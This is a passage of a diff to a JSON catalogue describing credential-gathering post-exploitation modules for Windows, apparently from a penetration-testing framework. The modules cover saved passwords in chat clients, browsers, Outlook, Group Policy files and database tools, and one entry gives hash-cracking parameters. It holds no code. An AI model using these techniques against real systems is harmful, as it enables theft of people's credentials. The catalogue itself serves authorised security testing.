"disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Gadugadu credentials on a Windows host. 
Gadu-Gadu is a Polish instant messaging client using a proprietary protocol. Gadu-Gadu was the most popular IM service in Poland.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/gadugadu.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/gadugadu", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/gpp": { + "name": "Windows Gather Group Policy Preference Saved Passwords", + "fullname": "post/windows/gather/credentials/gpp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Ben Campbell ", + "Loic Jaquemet ", + "scriptmonkey ", + "theLightCosine ", + "mubix " + ], + "description": "This module enumerates the victim machine's domain controller and\n connects to it via SMB. 
It then looks for Group Policy Preference XML\n files containing local user accounts and passwords and decrypts them\n using Microsofts public AES key.\n\n Cached Group Policy files may be found on end-user devices if the group\n policy object is deleted rather than unlinked.\n\n Tested on WinXP SP3 Client and Win2k8 R2 DC.", + "references": [ + "URL-http://msdn.microsoft.com/en-us/library/cc232604(v=prot.13)", + "URL-http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html", + "URL-http://blogs.technet.com/grouppolicy/archive/2009/04/22/passwords-in-group-policy-preferences-updated.aspx", + "URL-https://labs.portcullis.co.uk/blog/are-you-considering-using-microsoft-group-policy-preferences-think-again/", + "MSB-MS14-025" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/gpp.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/gpp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/halloy_irc": { + "name": "Halloy IRC credential gatherer", + "fullname": "post/windows/gather/credentials/halloy_irc", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jacob Tierney", + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. 
Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials stored on Halloy IRC Client in a windows remote host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/halloy_irc.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/halloy_irc", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/heidisql": { + "name": "Windows Gather HeidiSQL Saved Password Extraction", + "fullname": "post/windows/gather/credentials/heidisql", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "h0ng10" + ], + "description": "This module extracts saved passwords from the HeidiSQL client. These\n passwords are stored in the registry. 
They are encrypted with a custom algorithm.\n This module extracts and decrypts these passwords.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/heidisql.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/heidisql", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/icq": { + "name": "ICQ credential gatherer", + "fullname": "post/windows/gather/credentials/icq", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for ICQ credentials on a Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/icq.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/icq", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + 
"session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/idm": { + "name": "Windows Gather Internet Download Manager (IDM) Password Extractor", + "fullname": "post/windows/gather/credentials/idm", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sil3ntdre4m ", + "Unknown" + ], + "description": "This module recovers the saved premium download account passwords from\n Internet Download Manager (IDM). These passwords are stored in an encoded\n format in the registry. This module traverses through these registry entries\n and decodes them. Thanks to the template code of theLightCosine's CoreFTP\n password module.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/idm.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/idm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/ie": { + "name": "Ie credential gatherer", + "fullname": "post/windows/gather/credentials/ie", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. 
Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for ie credentials on a Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/ie.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/ie", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/imail": { + "name": "Windows Gather IPSwitch iMail User Data Enumeration", + "fullname": "post/windows/gather/credentials/imail", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sinn3r " + ], + "description": "This module will collect iMail user data such as the username, domain,\n full name, e-mail, and the decoded password. Please note if IMAILUSER is\n specified, the module extracts user data from all the domains found. 
If\n IMAILDOMAIN is specified, then it will extract all user data under that\n particular category.", + "references": [ + "EDB-11331" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/imail.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/imail", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/imvu": { + "name": "Windows Gather Credentials IMVU Game Client", + "fullname": "post/windows/gather/credentials/imvu", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Shubham Dawra " + ], + "description": "This module extracts account username & password from the IMVU game client\n and stores it as loot.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/imvu.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/imvu", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/incredimail": { + "name": "Incredimail credential gatherer", + "fullname": "post/windows/gather/credentials/incredimail", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim 
M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Incredimail credentials on a Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/incredimail.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/incredimail", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/kakaotalk": { + "name": "KakaoTalk credential gatherer", + "fullname": "post/windows/gather/credentials/kakaotalk", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for KakaoTalk credentials on a Windows host. 
KakaoTalk is a popular mobile messaging app most widely used in South Korea.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/kakaotalk.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/kakaotalk", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/kmeleon": { + "name": "Kmeleon credential gatherer", + "fullname": "post/windows/gather/credentials/kmeleon", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for K-meleon credentials on a Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/kmeleon.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/kmeleon", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + 
}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/line": { + "name": "LINE credential gatherer", + "fullname": "post/windows/gather/credentials/line", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials in LINE desktop application on a remote Windows host. LINE is the most popular Instant Messenger app in Japan.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/line.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/line", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/maxthon": { + "name": "Maxthon credential gatherer", + "fullname": "post/windows/gather/credentials/maxthon", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. 
Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Maxthon credentials on a Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/maxthon.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/maxthon", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/mcafee_vse_hashdump": { + "name": "McAfee Virus Scan Enterprise Password Hashes Dump", + "fullname": "post/windows/gather/credentials/mcafee_vse_hashdump", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Mike Manzotti ", + "Maurizio inode Agazzini" + ], + "description": "This module extracts the password hash from McAfee Virus Scan Enterprise (VSE)\n used to lock down the user interface. Hashcat supports cracking this type of\n hash using hash type sha1($salt.unicode($pass)) (-m 140) and a hex salt\n (--hex-salt) of 01000f000d003300 (unicode \"\\x01\\x0f\\x0d\\x33\"). 
A dynamic\n format is available for John the Ripper at the referenced URL.", + "references": [ + "URL-https://www.dionach.com/blog/disabling-mcafee-on-access-scanning" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/mcafee_vse_hashdump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/mdaemon_cred_collector": { + "name": "Windows Gather MDaemonEmailServer Credential Cracking", + "fullname": "post/windows/gather/credentials/mdaemon_cred_collector", + "aliases": [], + "rank": 600, + "disclosure_date": null, + "type": "post", + "author": [ + "Manuel Nader #AgoraSecurity" + ], + "description": "Finds and cracks the stored passwords of MDaemon Email Server.", + "references": [ + "BID-4686" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/gather/credentials/mdaemon_cred_collector.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/mdaemon_cred_collector", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/meebo": { + "name": "Windows Gather Meebo Password Extractor", + "fullname": "post/windows/gather/credentials/meebo", + 
"aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Sil3ntDre4m ", + "Unknown" + ], + "description": "This module extracts login account password stored by\n Meebo Notifier, a desktop version of Meebo's Online Messenger.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/meebo.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/meebo", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/miranda": { + "name": "Miranda credential gatherer", + "fullname": "post/windows/gather/credentials/miranda", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. 
Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Miranda credentials on a Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/miranda.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/miranda", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/moba_xterm": { + "name": "Windows Gather MobaXterm Passwords", + "fullname": "post/windows/gather/credentials/moba_xterm", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kali-Team " + ], + "description": "This module will determine if MobaXterm is installed on the target system and, if it is, it will try to\n dump all saved session information from the target. 
The passwords for these saved sessions will then be decrypted\n where possible, using the decryption information that HyperSine reverse engineered.", + "references": [ + "URL-https://blog.kali-team.cn/Metasploit-MobaXterm-0b976b993c87401598be4caab8cbe0cd" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/windows/gather/credentials/moba_xterm.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/moba_xterm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/mremote": { + "name": "Windows Gather mRemote Saved Password Extraction", + "fullname": "post/windows/gather/credentials/mremote", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "theLightCosine ", + "hdm ", + "mubix " + ], + "description": "This module extracts saved passwords from mRemote. mRemote stores\n connections for RDP, VNC, SSH, Telnet, rlogin and other protocols. It saves\n the passwords in an encrypted format. 
The module will extract the connection\n info and decrypt the saved passwords.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/mremote.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/mremote", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/mssql_local_hashdump": { + "name": "Windows Gather Local SQL Server Hash Dump", + "fullname": "post/windows/gather/credentials/mssql_local_hashdump", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Mike Manzotti ", + "nullbind" + ], + "description": "This module extracts the usernames and password\n hashes from an MSSQL server and stores them as loot. 
It uses the\n same technique in mssql_local_auth_bypass.", + "references": [ + "URL-https://www.dionach.com/blog/easily-grabbing-microsoft-sql-server-password-hashes" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/mssql_local_hashdump.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/mssql_local_hashdump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/navicat": { + "name": "Windows Gather Navicat Passwords", + "fullname": "post/windows/gather/credentials/navicat", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "HyperSine", + "Kali-Team " + ], + "description": "This module will find and decrypt stored Navicat passwords.", + "references": [ + "URL-https://github.com/HyperSine/how-does-navicat-encrypt-password", + "URL-https://blog.kali-team.cn/Metasploit-Navicat-fbc1390cf57c40b5b576584c48b8e125" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/windows/gather/credentials/navicat.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/navicat", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/nimbuzz": { + "name": "Windows Gather Nimbuzz Instant Messenger 
Password Extractor", + "fullname": "post/windows/gather/credentials/nimbuzz", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sil3ntdre4m ", + "Unknown" + ], + "description": "This module extracts the account passwords saved by Nimbuzz Instant\n Messenger in hex format.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/nimbuzz.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/nimbuzz", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/opera": { + "name": "Opera credential gatherer", + "fullname": "post/windows/gather/credentials/opera", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. 
Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Opera credentials on a Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/opera.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/opera", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/operamail": { + "name": "Operamail credential gatherer", + "fullname": "post/windows/gather/credentials/operamail", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. 
Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Operamail credentials on a Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/operamail.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/operamail", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/outlook": { + "name": "Windows Gather Microsoft Outlook Saved Password Extraction", + "fullname": "post/windows/gather/credentials/outlook", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Justin Cacak" + ], + "description": "This module extracts and decrypts saved Microsoft\n Outlook (versions 2002-2010) passwords from the Windows\n Registry for POP3/IMAP/SMTP/HTTP accounts.\n In order for decryption to be successful, this module must be\n executed under the same privileges as the user which originally\n encrypted the password.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/outlook.rb", + 
"is_install_path": true, + "ref_name": "windows/gather/credentials/outlook", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/plsql_developer": { + "name": "Windows Gather PL/SQL Developer Connection Credentials", + "fullname": "post/windows/gather/credentials/plsql_developer", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Adam Caudill", + "Jemmy Wang" + ], + "description": "This module can decrypt the histories and connection credentials of PL/SQL Developer,\n and passwords are available if the user chooses to remember.", + "references": [ + "URL-https://adamcaudill.com/2016/02/02/plsql-developer-nonexistent-encryption/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-11-09 13:58:14 +0000", + "path": "/modules/post/windows/gather/credentials/plsql_developer.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/plsql_developer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/postbox": { + "name": "Postbox credential gatherer", + "fullname": "post/windows/gather/credentials/postbox", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. 
